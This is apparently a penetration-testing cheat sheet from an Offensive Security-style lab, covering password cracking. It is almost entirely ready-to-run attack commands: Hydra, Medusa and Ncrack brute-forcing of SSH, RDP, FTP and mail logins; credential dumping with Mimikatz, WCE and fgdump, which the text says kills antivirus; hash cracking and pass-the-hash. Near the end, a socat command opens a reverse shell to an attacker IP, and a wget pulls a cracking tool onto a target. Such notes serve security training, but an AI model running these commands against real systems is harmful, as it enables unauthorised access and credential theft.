11 - Cracking

Medusa
     medusa -h 10.11.1.227 -U lab-users.txt -P lab-passwords.txt -M ftp | grep "ACCOUNT FOUND"

Ncrack (FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC)
     ncrack -U <[USERS_LIST]> -P <[PASSWORDS_LIST]> ftp://<[IP]>
     
AES Decryption
     http://aesencryption.net/

Convert multiple webpages into a word list
     for x in 'index' 'about' 'post' 'contact' ; do curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; done

Or convert html to word list dict
     html2dic index.html.out | sort -u > index-html.dict

--------------- Default Usernames and Passwords ---------------

CIRT
     http://www.cirt.net/passwords

Government Security - Default Logins and Passwords for Networked Devices
     http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php

Virus.org
     http://www.virus.org/default-password/

Default Password
     http://www.defaultpassword.com/

--------------- Brute Force ---------------

Nmap Brute forcing Scripts
     https://nmap.org/nsedoc/categories/brute.html

Nmap Generic auto detect brute force attack
     nmap --script brute -Pn <target.com or ip> <enter>

MySQL nmap brute force attack
     nmap --script=mysql-brute $ip

--------------- Dictionary Files ---------------

Word lists on Kali
     cd /usr/share/wordlists

Key-space Brute Force
     crunch 6 6 0123456789ABCDEF -o crunch1.txt
     crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
     crunch 8 8 -t ,@@^^%%%

Pwdump and Fgdump - Security Accounts Manager (SAM)
     pwdump.exe - attempts to extract password hashes
     fgdump.exe - attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials.

Windows Credential Editor (WCE)
     allows one to perform several attacks to obtain clear text passwords and hashes
          wce -w

Mimikatz
     extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets
     https://github.com/gentilkiwi/mimikatz From metasploit meterpreter (must have System level access): meterpreter> load mimikatz meterpreter> help mimikatz meterpreter> msv meterpreter> kerberos meterpreter> mimikatz_command -f samdump::hashes meterpreter> mimikatz_command -f sekurlsa::searchPasswords

--------------- Password Profiling ---------------
cewl can generate a password list from a web page
     # cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
Password Mutating
     John the ripper can mutate password lists
     nano /etc/john/john.conf
     john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt

Medusa
     Medusa, initiated against an htaccess protected web directory
          medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10
Ncrack
     ncrack (from the makers of nmap) can brute force RDP
     ncrack -vv --user offsec -P password-file.txt rdp://$ip
Hydra
     Hydra brute force against SNMP
          # hydra -P password-file.txt -v $ip snmp

     Hydra FTP known user and password list
          #hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp

     Hydra SSH using list of users and passwords
          hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh

     Hydra SSH using a known password and a username list
          hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh

     Hydra SSH Against Known username on port 22 
          hydra $ip -s 22 ssh -l <user> -P big\_wordlist.txt

     Hydra POP3 Brute Force
          hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V

     Hydra SMTP Brute Force
          hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V

     Hydra attack http get 401 login with a dictionary
          hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin

     Hydra attack Windows Remote Desktop with rockyou 
          hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip

--------------- Password Hash Attacks ---------------

Online Password Cracking
     https://crackstation.net/

Hashcat running on

Sample Hashes
     http://openwall.info/wiki/john/sample-hashes

Identify Hashes
     hash-identifier

Crask linux hashes you must first unshadow them:
     unshadow passwd-file.txt shadow-file.txt
     unshadow passwd-file.txt shadow-file.txt > unshadowed.txt

John the Ripper - Password Hash Cracking
     john $ip.pwdump
     john --wordlist=/usr/share/wordlists/rockyou.txt hashes
     john --rules --wordlist=/usr/share/wordlists/rockyou.txt
     john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

JTR forced descrypt cracking with wordlist
     john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt

JTR forced descrypt brute force cracking
     john --format=descrypt hash --show

Passing the Hash in Windows
     Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system:
     export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
     # pth-winexe -U administrator //$ip cmd

Cracking zip file password
     # fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u <filename>.zip
     # frackzip -D -v -u -p /usr/share/wordlists/rockyou.txt <file>

Cracking 7zip 
     # ./7x2john.pl file.7z > 7zhash
     # john 7zhash --wordlist:/usr/share/wordlists/rockyou.txt
     
Cracking rsa hash
     # python ssh2john.py id_rsa > id_rsa.hash
     # john id_rsa.hash --wordlist:/usr/share/wordlists/rockyou.txt
     
su crack
https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP ADDRESS>:<PORT>
https://labs.portcullis.co.uk/tools/sucrack/
     From local machine
     # tar -xvf sucrack-1.2.3.tar.gz
     # cd sucrack-1.2.3
     # ./configure
     # make
     # tar -cvf sucrack.tar sucrack-1.2.3/
     
     From remote machine
     # wget http://<local ip>/sucrack
     # tar xvf sucrack.tar
     ./sucrack -u root -w 10 /<dict file>